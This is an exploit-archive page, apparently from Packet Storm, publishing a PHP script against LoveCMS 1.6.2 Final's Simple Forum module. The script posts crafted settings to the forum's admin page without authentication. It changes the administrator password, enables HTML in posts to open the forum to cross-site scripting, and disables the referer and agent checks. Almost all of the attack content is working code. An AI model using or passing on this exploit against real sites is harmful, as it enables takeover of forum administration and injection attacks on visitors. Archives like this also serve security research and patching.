what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

lovecms-password.txt

lovecms-password.txt
Posted Nov 24, 2008
Authored by cOndemned | Site condemned.r00t.la

LoveCMS version 1.6.2 Final (Simple Forum 3.1d) change administrator password exploit.

tags | exploit
SHA-256 | 1114a2e5e3f7fbd43674f5270262c4c59ecaed73ddb8e7390aec1bf57b8f4296

lovecms-password.txt

Change Mirror Download
<?php

/**
* LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit
* Vulnerability found & exploited by cOndemned
*
* Download:
* http://www.thethinkingman.net/modules/download_manager/?id=4
*
* Description:
* This exploit changes forum admin password (ex. attacker will be
* able to delete threads/topics) and sets allowHTML to true
* (attacks such as XSS/HTML Injection will be possible)
*
*/

$target = 'localhost/audits/lovecms';
$pass = 'timetodie';
$buff = array
(
'language' => 'en',
'forumWidth' => '500',
'forumAlign' => 'left',
'forumTitle' => 'Simple Forum',
'threadsPerPage' => '15',
'wordLength' => '50',
'autoDelete' => '12',
'adminPass' => $pass,
'allowHTML' => '1',
'allowURLs' => '1',
'allowUBBs' => '1',
'enableIDs' => '0',
'enableSignature' => '1',
'enableRefererCheck' => '0',
'enableAgentCheck' => '0',
'agents' => 'Mozilla.Opera.Lynx.Mosaic.amaya.WebExplorer.IBrowse.iCab',
'nonos' => 'fuck.asshole',
'update' => 'Update'
);

$xpl = curl_init();

curl_setopt($xpl, CURLOPT_URL, $target . '/modules/simpleforum/admin/index.php');
curl_setopt($xpl, CURLOPT_POST, 1);
curl_setopt($xpl, CURLOPT_POSTFIELDS, $buff);

curl_exec($xpl);
curl_close($xpl);

echo "[!] Go to the website and check if U can login.\r\n";
?>

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close